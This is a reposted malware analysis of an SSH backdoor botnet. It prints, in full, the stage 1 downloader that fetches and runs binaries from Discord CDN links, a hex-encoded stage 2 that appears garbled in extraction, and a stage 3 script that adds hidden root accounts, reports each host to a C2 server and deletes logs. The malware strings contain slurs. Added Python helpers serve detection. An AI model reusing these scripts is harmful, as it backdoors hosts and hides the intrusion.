SSH backdoor botnet with a "research" infection technique

Security expert Tolijan Trajanovski analyzed an SSH backdoor botnet that implements an interesting "research" infection technique.

In a recent tweet, malware researcher @0xrb shared a list of URLs for recently captured IoT botnet samples. Among the links was an uncommon one: a URL behind the Discord CDN, which, as IoT malware researcher @_lubiedo pointed out, may be hard to block.

Summary: the malware author claims to carry out these infections for "research purposes", or, in his own words, to test which servers stay active the longest while carrying an undetected infection (by infection we mean adding a user for remote SSH access). The claim of "harmless research purposes" is backed by making the final stage of the infection a shell script rather than a compiled binary, which would take more time to reverse engineer. Likewise, the stage 1 binary payload is not obfuscated/packed. The botnet malware backdoors Linux devices for SSH access by adding users.

Points of interest:

Network IDS/blacklist evasion -> binary distribution over HTTPS via a CDN rather than from a VPS box (the typical approach)

Anti-sandbox and EDR/antivirus evasion -> use of timeouts, deletion of logs and bash history, echoed hex strings as the intermediate payload

Stage 1:

The infection starts by fetching a shell script from the URL below and executing it:
hxxps://cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh

#!/bin/bash

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732479996428428/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732483510599700/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732432163799040/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732462300659732/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732470899376128/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732420395237416/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732465059987987/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732474173947934/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732437822046228/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732445711663124/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget https://cdn.discordapp.com/attachments/780731895721492502/780732453115527208/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l

For IoT/Linux botnets, shell scripts are commonly used to download and execute the botnet's cross-compiled binaries. In this analysis we examine the binary sample compiled for Intel x86 CPUs.

URL: hxxps://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86
Binary name: x86
SHA256: 3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232
VirusTotal: https://www.virustotal.com/gui/file/3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232/detection
The x86 sample is detected by 42/62 AV engines. This is not surprising, since no packer or string encoding is used to obfuscate the sample.

Stage 2:

The x86 sample (stage 1) issues an HTTP GET request to the URL hxxp://45.11.181.37/…/vivid
The web server responds as follows:

(echo -en“\ x28 \ x77 \ x68 \ x69 \ x6c \ x65 \ x20 \ x74 \ x72 \ x75 \ x65 \ x3b \ x64 \ x6f \ x20 \ x28 \ x73 \ x6c \ x65 \ x65 \ x70 \ x20 \ x24 \ x28 \ x28 \ x28 \ x20 \ x52 \ x41 \ x4e \ x44 \ x4f \ x4d \ x20 \ x25 \ x20 \ x32 \ x30 \ x30 \ x20 \ x29 \ x29 \ x3b \ x28 \ x70 \ x72 \ x69 \ x6e \ x74 \ x66 \ x20 \ x22 \ x28 \ x77 \ x67 \ x65 \ x74 \ x20 \ x2d \ x71 \ x20 \ x22 \ x68 \ x74 \ x74 \ x70 \ x3a \ x2f \ x2f \ x67 \ x61 \ x79 \ x2e \ x65 \ x6e \ x65 \ x72 \ x67 \ x79 \ x2f \ x2e \ x2e \ x2e \ x2f \ x6f \ x73 \ x22 \ x20 \ x2d \ x4f \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x63 \ x68 \ x6d \ x6f \ x64 \ x20 \ x37 \ x37 \ x37 \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x2e \ x2f \ x2e \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x20 \ x72 \ x72e \ x2e \ x20e \ x72 \ x66 \ x20 \ x2e \ x2e \ x2e \ x2e \ x20 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x68 \ x69 \ x69 \ x73 \ x74 \ x6f \ x72 \ x79 \ x20 \ x2d \ x63 \ x29 \ x20 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x22 \ x7c \ x62 \ x61 \ x73 \ x68 \ x29 \ x20 \ x26 \ x20 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x29 \ x20 \ x26 \ x20 \ x73 \ x6c \ x65 \ x65 \ x70 \ x20 \ x34 \ x33 \ x32 \ x30 \ x30\ x3b \ x64 \ x6f \ x6e \ x65 \ x20 \ x26 \ x20 \ x64 \ x69 \ x73 \ x6f \ x77 \ x6e \ x20 \ x26 \ x29 \ x3e \ x20 \ x2f \ x64 \ x65 \ x76 \ x76 \ x2f \ x6e \ x75 \ x6c \ x6c \ x20 \ x32 \ x3e \ x26 \ x31 \ x20 \ x26 \ x20 \ x63 \ x6c \ x65 \ x61 \ x72 \ x3b \ x63 \ x6c \ x65 \ x61 \ x72 \ x72 \ x3b \ x68 \ x69 \ x73 \ x74 \ x6f \ x72 \ x79 \ x20 \ x2d \ x63“ | bash)> / dev / null 2>&1

The byte sequence is piped directly into bash rather than written to a file on the machine; this is how the echoed-hex-string payload delivery technique, first introduced by Hajime, normally works. The hex string decodes to the following shell command sequence:

(while true;do (sleep $(( RANDOM % 200 ));(printf "(wget -q "http://gay.energy/…/os" -O …. ;chmod 777 …. ;./…. ; rm -rf …. ;clear;clear;history -c) > /dev/null 2>&1"|bash) & > /dev/null 2>&1) & sleep 43200;done & disown &)> /dev/null 2>&1 & clear;clear;history -c

The command sequence fetched from the web server instructs the victim device to:

  1. Wait for a period of time -> likely evasion of EDR/antivirus and sandbox analysis
  2. Download the stage 3 payload hxxp://gay.energy/…/os
  3. Clear the bash history
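
Decoding such an echoed-hex delivery offline, as an added example (Python, not code from the analysis): it turns the `\xNN` escapes back into the command without piping anything to bash, then lists the URLs and anti-forensics strings a defender would hunt for. The response it parses is a constructed sample, and the indicator list is an assumption of this example.

```python
import re

# One \xNN escape; the optional whitespace also copes with copies of a
# response that were mangled in extraction into "\ x28 \ x77 ...".
HEX_ESCAPE = re.compile(r'\\\s*x([0-9a-fA-F]{2})')

# Strings in a decoded stage that point at anti-forensics or staging rather
# than ordinary administration (assumed list for this example).
INDICATORS = ('history -c', '.bash_history', '/var/log/lastlog',
              'chmod 777', 'useradd -o -u 0', 'disown')


def decode_echo_hex(response: str) -> str:
    """Decode the \\xNN string of an `echo -en "..." | bash` delivery without running it."""
    raw = bytes(int(h, 16) for h in HEX_ESCAPE.findall(response))
    return raw.decode('utf-8', errors='replace')


def extract_urls(script: str) -> list:
    """Return the URLs the decoded script would fetch (hosts to block or hunt for)."""
    found = re.findall(r'https?://[^\s"\'|;)]+', script)
    return sorted(set(found))


def find_indicators(script: str) -> list:
    """Return which INDICATORS occur in the decoded script, in INDICATORS order."""
    return [i for i in INDICATORS if i in script]


# Constructed sample response (not the one from the analysis): a short command
# encoded exactly the way the stage 1 binary receives its stage 2.
SAMPLE_RESPONSE = (
    '(echo -en "\\x73\\x6c\\x65\\x65\\x70\\x20\\x35\\x3b\\x77\\x67\\x65\\x74\\x20'
    '\\x2d\\x71\\x20\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x32\\x30\\x33\\x2e\\x30'
    '\\x2e\\x31\\x31\\x33\\x2e\\x39\\x2f\\x6f\\x73\\x3b\\x68\\x69\\x73\\x74\\x6f'
    '\\x72\\x79\\x20\\x2d\\x63" | bash) > /dev/null 2>&1'
)

if __name__ == '__main__':
    decoded = decode_echo_hex(SAMPLE_RESPONSE)
    print(decoded)                   # sleep 5;wget -q http://203.0.113.9/os;history -c
    print(extract_urls(decoded))     # ['http://203.0.113.9/os']
    print(find_indicators(decoded))  # ['history -c']
```

Feed it the captured HTTP response body (or the proxy log line) rather than the running process, so the command is read and not executed.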

Stage 3:

The stage 3 payload, os, is also a shell script, which does the following:

  1. Adds users
  2. Issues a request to a PHP server that registers the newly infected/backdoored device. The registration request contains the port of the SSH server on the victim device, the OS name, the number of CPUs available on the device, and the RAM + SWAP memory.
  3. Deletes logs and bash history
#!/bin/bash
# Congrats You Found Me, I felt it was wrong to make this in C and not let any of you have a chance to remove it since its only
# An Added Super User and can simply be removed, or password changed.
# Hit Up My Discord: CodeAbuse#1263

# For Info to remove it or simply how.
# BTW: I do not infect the servers or do anything with them, tbh i just watch cause im bored. 99% of them would ban with one dos attack.
# Im simply watching to see which hosts last the longest for basic nets so ik there is a higher chance of my new project
# surviving on them the longest. Call it research purposes.
# Only doing this cause i dont really speak to a lot of ppl or watch that much any more so it just keeps me in the loop a bit.
KillMe="$(echo -e "${0}"|tr -d './')"
function LogyLog(){
if [ -f /usr/bin/yum ]; then
wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
elif [ -f /usr/bin/apt-get ]; then
wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
fi
}
# Very Simple To Do Yet Not Noticed That Much?
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system; 
echo -e "G2PHFW3yUkTvdZ86v2aj\nG2PHFW3yUkTvdZ86v2aj" | passwd system;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os; 
echo -e "s2FF4rHxDJuKwj8V5wCg\ns2FF4rHxDJuKwj8V5wCg" | passwd os;
LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash passwd; 
echo -e "fwZ4HmvXWC5m7V4EyzQ5\nfwZ4HmvXWC5m7V4EyzQ5" | passwd passwd;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bash; 
echo -e "AhdaVjd9TfzBFGW84pYw\nAhdaVjd9TfzBFGW84pYw" | passwd bash;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash shell; 
echo -e "U3YznCMKqNXhVcYLMyX2\nU3YznCMKqNXhVcYLMyX2" | passwd shell;LogyLog; 
rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;
clear;history -c
jobs;clear;clear;
rm -rf .bash_history;
rm -rf /root/.bash_history;
history -c;
exit
rm -rf ${KillMe}
rm -rf .bash_history;rm -rf /root/.bash_history
history -c
exit
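
One host-side check for the stage 3 persistence, as an added example (Python, not part of the original analysis): it audits an /etc/passwd snapshot for the extra UID 0 accounts that `useradd -o -u 0 -g 0 -M -d /root -s /bin/bash <name>` leaves behind. The snapshot below is constructed, and the reason labels are this example's own.

```python
# Constructed /etc/passwd snapshot (not taken from an infected host). The
# `system` and `os` rows mirror what the stage 3 useradd lines create: a
# second UID 0 (-o -u 0) that shares root's home (-d /root).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
system:x:0:0::/root:/bin/bash
os:x:0:0::/root:/bin/bash
toor:x:0:0::/home/toor:/bin/sh
"""


def audit_passwd(passwd_text: str) -> list:
    """Flag every non-root account that is UID 0 or shares root's home directory.

    Returns (username, reason) tuples in file order; an empty list means clean.
    """
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:  # malformed row: skip rather than guess
            continue
        name, _pw, uid, _gid, _gecos, home, _shell = fields
        if name == 'root':
            continue
        reasons = []
        if uid == '0':
            reasons.append('uid 0')       # duplicate root via useradd -o -u 0
        if home == '/root':
            reasons.append('home /root')  # the -d /root hint, even with another UID
        if reasons:
            findings.append((name, ', '.join(reasons)))
    return findings


if __name__ == '__main__':
    # Live host: audit_passwd(open('/etc/passwd').read()). The shell
    # equivalent of the UID test is: awk -F: '$3 == 0 && $1 != "root"' /etc/passwd
    for name, why in audit_passwd(SAMPLE_PASSWD):
        print(f'{name}: {why}')
```

Pair this with a check that /var/log/lastlog and the root and user .bash_history files still exist, since the script removes them right after creating the accounts.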

PHP server handling the registration of newly infected devices: hxxp://gay.energy/WelcomeNewBotBuddy/OwO.php

Original analysis @ https://tolisec.com/ssh-backdoor-botnet-with-research-infection-technique/

*Compiled by: Domino

*Source: securityaffairs